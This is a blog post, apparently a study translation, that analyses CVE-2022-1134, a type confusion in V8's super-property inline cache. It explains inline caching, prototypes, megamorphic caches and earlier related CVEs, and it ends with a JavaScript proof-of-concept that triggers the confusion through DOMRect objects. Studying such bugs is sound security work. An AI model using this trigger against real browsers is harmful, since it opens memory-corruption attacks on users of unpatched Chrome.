CVE-2022-1134 Analysis

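mhibio · July 7, 2022

A few days ago, an analysis of CVE-2022-1134 titled “The Chromium super (inline cache) type confusion” was published.

CVE-2022-1134 is a type confusion vulnerability in the V8 engine. Besides the vulnerability itself, the original article also explains inline caching, super in JavaScript, and earlier vulnerabilities of a similar kind.

This post is for my own reference: a partial translation of the original article combined with notes from my own study.

Some parts may differ from the original or reflect my own misunderstandings, so please keep that in mind. If you want more detail, I recommend reading the original article rather than this post.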

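Inline caching (IC) in the V8 engine

Inline caching (IC for short) is an optimization technique that speeds up bytecode execution in the V8 interpreter.

Ignition compiles a function to bytecode and collects profiling data and feedback each time the function runs. The feedback is later used by the JIT compiler.

For details on optimization, see “this document”.

For details on inline caching, see “this document”.

Bytecode handling in the V8 engine

Bytecode can be inspected in d8 with the --print-bytecode option.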

function f(a) {
  return a.x
}

This function produces the following bytecode.

[generated bytecode for function: f (0x11e7001d36cd <SharedFunctionInfo f>)]
...
Bytecode Age: 0
         0x11e7001d3886 @    0 : 2d 03 00 00       GetNamedProperty a0, [0], [0]
         0x11e7001d388a @    4 : a9                Return

The generated bytecodes are handled by the various IGNITION_HANDLERs.

For example, the GetNamedProperty bytecode used in the code above is handled by the following handler.

IGNITION_HANDLER(GetNamedProperty, InterpreterAssembler) {
  ...
  accessor_asm.LoadIC_BytecodeHandler(&params, &exit_point);

  BIND(&done);
  {
    SetAccumulator(var_result.value());
    Dispatch();
  }
}

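The IGNITION_HANDLER calls into LoadIC_BytecodeHandler.

LoadIC_BytecodeHandler inspects the collected feedback and decides how the property should be accessed.

When the function runs for the first time there is no feedback yet, so the property access goes through the relatively slow runtime implementation.

At the same time feedback is collected, and an optimized property access handler for the object is cached based on it.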

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  ...
  GotoIf(IsUndefined(p->vector()), &no_feedback);

  ...
  BIND(&no_feedback);      //<---------- no feedback, falls back to runtime implementation
  {
    Comment("LoadIC_BytecodeHandler_nofeedback");
    // Call into the stub that implements the non-inlined parts of LoadIC.
    exit_point->ReturnCallStub(
        Builtins::CallableFor(isolate(), Builtin::kLoadIC_NoFeedback),
        p->context(), p->receiver(), p->name(),
        SmiConstant(FeedbackSlotKind::kLoadProperty));
  }
  ...

Once feedback has been collected, the bytecode handler looks for the cached property handler best suited to the current property access.

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  ...
  // If feedback is available -> inlined fast path.
  {
    Comment("LoadIC_BytecodeHandler_fast");

    TVARIABLE(MaybeObject, var_handler);
    Label try_polymorphic(this), if_handler(this, &var_handler);

    TNode<MaybeObject> feedback = TryMonomorphicCase(           //<-------- Look for cached handler
        p->slot(), CAST(p->vector()), lookup_start_object_map, &if_handler,
        &var_handler, &try_polymorphic);

    BIND(&if_handler);  //<--------- handler found
    HandleLoadICHandlerCase(p, CAST(var_handler.value()), &miss, exit_point);  //<------- try to use optimized handler
    ...
  }
}

If a property handler is found, it is used. If none is found, or the cached one does not fit the current access (a cache miss), execution falls back to the slow path again.
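The hit and miss flow described above can be sketched in plain JavaScript. This is only a toy model and not V8 code: V8 keys its caches on hidden classes (maps), which scripts cannot observe, so the sketch approximates a "shape" by the list of own property names. The names shapeOf and ToyLoadIC are made up for illustration.

```javascript
// Toy model only. A "shape" stands in for a V8 map and is approximated by
// the list of own property names. All names here are hypothetical.
function shapeOf(obj) {
  return Object.keys(obj).join(',');
}

class ToyLoadIC {
  constructor(name) {
    this.name = name;
    this.cachedShape = null;   // shape recorded on the last miss
    this.cachedHandler = null; // fast accessor installed for that shape
    this.hits = 0;
    this.misses = 0;
  }

  load(obj) {
    if (this.cachedHandler !== null && shapeOf(obj) === this.cachedShape) {
      this.hits++;
      return this.cachedHandler(obj); // fast path: reuse the cached handler
    }
    return this.miss(obj);            // slow path: cache miss
  }

  miss(obj) {
    this.misses++;
    const name = this.name;
    // Record the shape and install a handler for the next access.
    this.cachedShape = shapeOf(obj);
    this.cachedHandler = (o) => o[name];
    return obj[name];
  }
}

const ic = new ToyLoadIC('x');
const results = [ic.load({ x: 1 }), ic.load({ x: 2 }), ic.load({ x: 3, y: 4 })];
console.log(results, ic.hits, ic.misses); // [ 1, 2, 3 ] 1 2
```

The first access misses and installs a handler, the second hits because the shape matches, and the third misses again because the object has a different shape.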

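Caching and using property handlers

When the cache miss described above occurs, it is handled by a runtime function of the form *IC_Miss().

The original article uses LoadIC_Miss() as its example, but I will not cover it here.

Most *IC_Miss() functions appear to perform the following steps.

Create the corresponding *IC object
Create a new optimized handler
Update the inline cache where appropriate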

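Inheritance in JavaScript

The vulnerability discussed below occurs when the inline cache handles property access on super.

To understand super, we first need to look at inheritance.

The super keyword (or an equivalent way of reaching the base class) exists in other object-oriented languages such as Java and C++, but the way super works in JavaScript is different.

The original article explains the differences; I will not go into them in detail here.

Going by how base-class access works in Java or C++, you would expect super.foo in the following code to be 1, but it is actually undefined.

The reason is that in JavaScript super.foo is looked up on the parent's prototype (A.prototype), whereas the class field foo = 1 is defined on each instance, not on the prototype. The property has to be explicitly defined on the prototype for super to find it.

This is where JavaScript differs from other object-oriented languages.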

class A {
    foo = 1;
}

class B extends A {
    constructor() {
        super();
        super.foo; //<------ undefined
    }
}
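A small runnable check makes the difference visible. It is a sketch under the assumption of a runtime that supports class fields; the method bar and the helper names probe and fooOnPrototype are added purely for illustration.

```javascript
class A {
  foo = 1;            // class field: created on every instance
  bar() { return 2; } // method: lives on A.prototype
}

class B extends A {
  probe() {
    return {
      superFoo: super.foo,   // looked up on A.prototype, which has no foo
      thisFoo: this.foo,     // own property of the instance
      superBar: super.bar(), // found on A.prototype
    };
  }
}

const probe = new B().probe();
const fooOnPrototype = Object.prototype.hasOwnProperty.call(A.prototype, 'foo');
console.log(probe, fooOnPrototype);
// { superFoo: undefined, thisFoo: 1, superBar: 2 } false
```

Only properties that actually live on the prototype, such as methods and accessors, are reachable through super.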

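JavaScript classes are defined through prototypes.

The code below shows class B inheriting from class A.

What extends does in the first snippet can be expressed in much the same way by assigning to prototype.__proto__ directly, as in the second snippet.

If you are not familiar with prototypes, it is enough to think of a prototype as the object that another object inherits its properties from.

One thing I found interesting while studying this is that B.prototype.__proto__ gives access to the prototype of the prototype.

// JavaScript, using class syntax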
class A {
  get prop() {
    return this.a;
  }
}

class B extends A {
  constructor() {
    super();
    this.a = 'B';
  }
  m() {
    return super.prop;
  }
}

var b = new B();
b.m();  //<------ 'B'

// JavaScript, setting the prototype chain directly
class B {
  m() {
    return super.prop;
  }
}

B.prototype.__proto__ = {get prop() {return this.x}};

var b = new B();
b.x = 1;
b.m() //<-------- 1

Now that inheritance and prototypes are reasonably clear, it is time to look at the super keyword in more detail.

The following code shows that a super property for B's methods can be defined through prototype.__proto__.

class B {
  m() {
    return super.prop;
  }
}

B.prototype.__proto__ = {prop : 1};

var b = new B();
b.m() //<-------- 1
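Because the lookup goes through the prototype of B.prototype at the time of each access, re-pointing that prototype changes what super.prop returns, even for instances that already exist. The following sketch uses the standard Object.setPrototypeOf instead of __proto__; the variable names are only for illustration.

```javascript
class B {
  m() {
    return super.prop;
  }
}

const b = new B();

// Initially the prototype of B.prototype is Object.prototype, which has no prop.
const before = b.m();

Object.setPrototypeOf(B.prototype, { prop: 1 });
const first = b.m();

// Re-pointing the parent prototype again is picked up by the same instance.
Object.setPrototypeOf(B.prototype, { prop: 'changed' });
const second = b.m();

console.log(before, first, second); // undefined 1 changed
```

This flexibility is what makes it possible to put objects of arbitrary types, such as typed arrays or functions, at the start of a super lookup.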

Triggering a TypeError

Interestingly, JavaScript also accepts code like the following.

That is, until it reaches b.m()…

class B {
  m() {
    return super.length;
  }
}

var b = new B();
B.prototype.__proto__ = new Int8Array(1);
b.m();  //<---- throw TypeError

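Here an Int8Array was installed as the prototype of B.prototype.

Calling b.m() after that throws a TypeError. The reason is simple.

The length getter found on the typed array's prototype chain is called with b as its receiver (this). It expects a receiver of type JS_TYPED_ARRAY_TYPE, but b is a JS_OBJECT_TYPE.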
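The split between "where the lookup starts" and "which object the getter runs on" can be reproduced without classes by using the standard Reflect.get(target, key, receiver), which starts the lookup at target and calls any getter with receiver as this. This is only an illustration of the language semantics, not of V8 internals, and the variable names are made up.

```javascript
const typedArray = new Int8Array(1);

// Lookup starts at typedArray, but the length getter runs on the receiver,
// so the receiver's length (3) is returned, not typedArray's (1).
const withTypedArrayReceiver = Reflect.get(typedArray, 'length', new Int8Array(3));

// With a plain object as receiver, the getter rejects its `this`.
let threwTypeError = false;
try {
  Reflect.get(typedArray, 'length', {});
} catch (e) {
  threwTypeError = e instanceof TypeError;
}

console.log(withTypedArrayReceiver, threwTypeError); // 3 true
```

The second call corresponds to b.m() in the example above: the lookup starts at the Int8Array, while the receiver is an ordinary object.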

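Now let's look at the V8 code.

The problem with SuperIC

This chapter of the original article explains SuperIC and briefly covers earlier vulnerabilities in it.

The super inline cache (SuperIC) is the inline cache used for accessing super properties.

The corresponding IGNITION_HANDLER is as follows.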

IGNITION_HANDLER(GetNamedPropertyFromSuper, InterpreterAssembler) {
  ...
  TNode<Object> result =
      CallBuiltin(Builtin::kLoadSuperIC, context, receiver,
                  home_object_prototype, name, slot, feedback_vector);
  SetAccumulator(result);
  Dispatch();
}

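super property accesses are handled by kLoadSuperIC.

It works very much like LoadIC.

One thing is special:

**For a super property access, the lookup starts at the parent prototype, while the receiver (this) is still the object the method was called on.**

Because the parent prototype can have a different type from the receiver, the code must not assume that the two have the same type. Where that check was missing, vulnerabilities followed (CVE-2021-30517).

In a little more detail:

The object on which the super property lookup starts is available as lookup_start_object.

The following code loads the map of lookup_start_object.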

void AccessorAssembler::LoadSuperIC(const LoadICParameters* p) {
  ...
  TNode<Map> lookup_start_object_map =
      LoadReceiverMap(p->lookup_start_object());
  ...

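Inside V8 the object the method was called on (this) is the receiver, while the object on which the lookup starts (the prototype of the home object) is the lookup_start_object.

In other words, several vulnerabilities were found in the past where lookup_start_object and receiver were mixed up, and CVE-2021-30517 was the first of them to be discovered.

That vulnerability occurs in the call_handler case of HandleLoadICHandlerCase, where the cached handler is invoked.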

void AccessorAssembler::HandleLoadICHandlerCase(
    const LazyLoadICParameters* p, TNode<Object> handler, Label* miss,
    ExitPoint* exit_point, ICMode ic_mode, OnNonExistent on_nonexistent,
    ElementSupport support_elements, LoadAccessMode access_mode) {
  ...

  BIND(&call_handler);
  {
    exit_point->ReturnCallStub(LoadWithVectorDescriptor{}, CAST(handler),
                               p->context(), p->receiver(), p->name(),     //<------- receiver used in the call.
                               p->slot(), p->vector());
  }
}

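At this point p->lookup_start_object(), the parent prototype, should have been passed instead of p->receiver(). Because it was not, the handler operates on an object of a different type than the one it was created for.

call_handler is a special-case handler path used only for string objects and function objects.

The following code is meant to cause the type confusion.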

class C {
  m() {
    super.prototype;
  }
}
function f() {}
C.prototype.__proto__ = f;
// Inside C's methods, lookup_start_object is now the function f.
// To handle this, SuperIC would pick the call_handler that exists for functions.

let c = new C();
c.m();
// But when c.m() evaluates super.prototype, the call_handler is given
// the receiver (c) as its argument instead of lookup_start_object (f).

A closer look at ComputeHandler, however, shows that there is another obstacle to triggering the bug.

Handle<Object> LoadIC::ComputeHandler(LookupIterator* lookup) {
  Handle<Object> receiver = lookup->GetReceiver();
  ...
  if (!IsAnyHas() && !lookup->IsElement()) {
    ...
    if (receiver->IsString() && *lookup->name() == roots.length_string()) {
      TRACE_HANDLER_STATS(isolate(), LoadIC_StringLength);
      return BUILTIN_CODE(isolate(), LoadIC_StringLength);
    }
    ...
  }

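The call_handler does use the receiver, but the type of the receiver is also checked when the call_handler for super.prototype is created.

A function that evaluates super.prototype must be defined as a method inside a class, so the type of its this (the receiver) cannot be changed either.

Getting around this requires the megamorphic inline cache.

Megamorphic inline cache

An inline cache site can end up using handlers from a cache that is shared with other sites.

This is called the megamorphic inline cache. Consider a simple function like the following.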

function f(a) {
  return a.x;
}

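In this example, as long as a has the same map every time f() is called, the inline cache stays monomorphic.

If an argument with a different map then comes in, the inline cache becomes polymorphic.

A polymorphic IC can only handle a limited number of maps, however. If new maps keep arriving, the IC becomes megamorphic.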
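The progression from monomorphic to polymorphic to megamorphic can be modelled with a small state machine. This is a toy sketch, not V8's implementation: shapes are approximated by own property names, and the limit MAX_POLYMORPHIC_SHAPES = 4 is an assumption chosen for the illustration. The names ToyFeedbackSlot and shapeOf are hypothetical.

```javascript
// Assumed limit for this toy model only.
const MAX_POLYMORPHIC_SHAPES = 4;

// A "shape" stands in for a V8 map (hypothetical approximation).
function shapeOf(obj) {
  return Object.keys(obj).join(',');
}

class ToyFeedbackSlot {
  constructor() {
    this.shapes = [];
    this.state = 'uninitialized';
  }

  record(obj) {
    // Once megamorphic, the slot never goes back in this model.
    if (this.state === 'megamorphic') return this.state;

    const shape = shapeOf(obj);
    if (!this.shapes.includes(shape)) this.shapes.push(shape);

    if (this.shapes.length === 1) {
      this.state = 'monomorphic';
    } else if (this.shapes.length <= MAX_POLYMORPHIC_SHAPES) {
      this.state = 'polymorphic';
    } else {
      this.state = 'megamorphic';
      this.shapes = []; // per-site shapes are no longer tracked
    }
    return this.state;
  }
}

const slot = new ToyFeedbackSlot();
const states = [
  slot.record({ x: 1 }),
  slot.record({ x: 2 }),        // same shape, still monomorphic
  slot.record({ x: 1, a: 1 }),  // second shape
  slot.record({ x: 1, b: 1 }),
  slot.record({ x: 1, c: 1 }),  // fourth shape, still polymorphic
  slot.record({ x: 1, d: 1 }),  // fifth shape exceeds the limit
  slot.record({ x: 1 }),
];
console.log(states.join(' '));
// monomorphic monomorphic polymorphic polymorphic polymorphic megamorphic megamorphic
```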

A megamorphic IC is shared with other functions, so a handler created in function A can, for example, be used in function B. The code below illustrates this.

function main() {
  function f() {}
  class A {
    m() {
      return super.prototype;
    }
  };
  A.prototype.__proto__ = f;
  f.prototype;
  let a = new A();
  a.m();
}

Each time main() runs, a new class A is created, so new A() produces an object with a new map, and each time f is assigned to A.prototype.__proto__ a new map is created for f as well.

These accesses therefore end up using the megamorphic IC, and super.prototype will then use the call_handler that was created by f.prototype.

function main() {
  ...
  A.prototype.__proto__ = f;
  f.prototype;    //<------ create handler for map of f in megamorphic cache
  let a = new A();
  a.m();          //<------ calls super.prototype, lookup_start_object is f,
                  //        so the handler created by f.prototype will be used
                  //        but `a` (receiver) will be used by the handler
}

This way the call_handler is passed the receiver instead of lookup_start_object, and the type confusion occurs.
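The idea can be modelled in a few lines of plain JavaScript. This is a deliberately simplified toy, not V8 code: objects carry an explicit shape tag and a slots array, the shared cache is a Map keyed by shape and property name, and every identifier (toyStubCache, loadNamed, loadSuperBuggy, loadSuperFixed) is hypothetical.

```javascript
// Toy model of a cache shared by all access sites, keyed by (shape, name).
const toyStubCache = new Map();
const cacheKey = (shape, name) => `${shape}:${name}`;

// Two toy objects with different layouts.
const toyFunction = { shape: 'Function', slots: ['<prototype of f>'] };
const toyInstance = { shape: 'Instance', slots: [0x41414141] };

// Site 1: models `f.prototype`. On a miss it installs a handler that is
// only valid for the Function layout (slot 0 holds the prototype).
function loadNamed(obj, name) {
  const key = cacheKey(obj.shape, name);
  if (!toyStubCache.has(key)) {
    toyStubCache.set(key, (o) => o.slots[0]);
  }
  return toyStubCache.get(key)(obj);
}

// Site 2: models `super.prototype`. The handler is selected by the shape of
// lookupStart, but the buggy variant runs it on the receiver.
function loadSuperBuggy(lookupStart, receiver, name) {
  const handler = toyStubCache.get(cacheKey(lookupStart.shape, name));
  return handler(receiver); // wrong object for this handler
}

// Variant that passes the object the handler was selected for.
function loadSuperFixed(lookupStart, receiver, name) {
  const handler = toyStubCache.get(cacheKey(lookupStart.shape, name));
  return handler(lookupStart);
}

loadNamed(toyFunction, 'prototype'); // populates the shared cache
const confused = loadSuperBuggy(toyFunction, toyInstance, 'prototype');
const correct = loadSuperFixed(toyFunction, toyInstance, 'prototype');
console.log(confused.toString(16), correct); // 41414141 <prototype of f>
```

In the toy, the confused load simply returns an unrelated field of the receiver. In the real engine the handler interprets the receiver's memory with the wrong layout, which is what makes it a memory-safety issue.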

A related vulnerability of this kind, CVE-2021-38001, also exists.

The vulnerability

The vulnerability we are looking at occurs in the following code.

Handle<Object> LoadIC::ComputeHandler(LookupIterator* lookup) {
  ...
  Handle<Map> map = lookup_start_object_map();
  ...
    case LookupIterator::ACCESSOR: {
        ...
        CallOptimization call_optimization(isolate(), getter);
        if (call_optimization.is_simple_api_call()) {          //<--------- 1.
          CallOptimization::HolderLookup holder_lookup;
          Handle<JSObject> api_holder =
              call_optimization.LookupHolderOfExpectedType(isolate(), map,      //<----- 2.
                                                           &holder_lookup);

          if (!call_optimization.IsCompatibleReceiverMap(api_holder, holder,    //<----- 3.
                                                         holder_lookup) ||
              !holder->HasFastProperties()) {
            TRACE_HANDLER_STATS(isolate(), LoadIC_SlowStub);
            return LoadHandler::LoadSlow(isolate());
          }

          smi_handler = LoadHandler::LoadApiGetter(
              isolate(), holder_lookup == CallOptimization::kHolderIsReceiver);
          ...

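Check 1 tests whether the getter is a simple_api_call, and checks 2 and 3 test whether the current map is suitable for it.

A simple_api_call is the mechanism by which V8, when embedded in an application, lets JavaScript call external C++ functions provided by the embedder.

Through the V8 API, functionality defined in the embedder can be used from V8, and functionality defined in V8 can be used from the embedder.

Going back to the checks, 2 and 3 are supposed to confirm that the map is suitable for the API call.

The problem is that the map being checked is the wrong one.

The map that is checked is the map of lookup_start_object, even though the getter is eventually called with the receiver.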

class B {
  m() {
    return super.prop;
  }
}

var b = new B();
var a = {get prop() {return this.x}, x : 'A'};
b.x = 'B';

B.prototype.__proto__ = a;

b.m() //<-------- 'B'

Note that b.m() returns b.x ('B'), not a.x ('A').

Once again, this is because an accessor reached through super is called with the receiver (this).
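The mismatch between the object that is validated and the object the getter actually runs on can be sketched as follows. This is a toy model and not the V8 or Blink implementation: a WeakSet stands in for "objects created by the embedder", and all names (apiObjects, makeApiObject, apiGetter, buggyLoad, checkedLoad) are hypothetical. checkedLoad is just one possible corrected variant for the toy, not a description of the actual patch.

```javascript
// Toy stand-in for "objects created through the embedder API".
const apiObjects = new WeakSet();

function makeApiObject(x) {
  const obj = { slots: [x] };
  apiObjects.add(obj);
  return obj;
}

// Toy API getter: assumes `this` is an API object and reads slot 0.
function apiGetter() {
  return this.slots[0];
}

// Buggy variant: validates lookupStart, then runs the getter on receiver.
function buggyLoad(lookupStart, receiver) {
  if (!apiObjects.has(lookupStart)) throw new TypeError('Illegal invocation');
  return apiGetter.call(receiver);
}

// Variant that validates the object the getter will actually run on.
function checkedLoad(lookupStart, receiver) {
  if (!apiObjects.has(receiver)) throw new TypeError('Illegal invocation');
  return apiGetter.call(receiver);
}

const rect = makeApiObject(1);
const plain = { slots: [0x41414141] }; // not an API object

const leaked = buggyLoad(rect, plain);

let rejected = false;
try {
  checkedLoad(rect, plain);
} catch (e) {
  rejected = e instanceof TypeError;
}

console.log(leaked.toString(16), rejected); // 41414141 true
```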

Interactions between V8 and Blink

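We will trigger the bug with DOMRectReadOnly, one of the Blink objects exposed to JavaScript through the V8 API.

To see how DOMRectReadOnly is actually laid out in V8 and Blink memory, please refer to the original article.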

class B {
    m() {
      return super.x;
    }
  }
  B.prototype.__proto__ = new DOMRectReadOnly(1, 1, 1, 1);
  let b = new B();
  b.m(); //<---- throws TypeError: Illegal invocation

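If we attempt the trigger before the IC has been set up, however, we just get an error like the one above. So we repeat the object creation many times to push the access into the megamorphic IC and fool the cached handler.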

class B {
  m() {
    return super.x;
  }
}

function main(i) {
  var domRect = new DOMRect(1, 1, 1, 1);
  domRect['a' + i] = 1;
  if (i < 20 - 1) {
    B.prototype.__proto__ = {};  //<----- sets to `{}` to avoid throw before triggering bug.
  } else {
    B.prototype.__proto__ = domRect;  //<----- triggers the bug after inline cache is created.
  }
  let b = new B();

  b.x0 = 0x40404040;
  b.x1 = 0x41414141;
  b.x2 = 0x42424242;
  b.x3 = 0x43434343;
  domRect.x; //<------ create inline cache
  b.m();     //<------ use inline cache, type confusion on the last iteration (i == 19)
}  

for (let i = 0; i < 20; i++) main(i);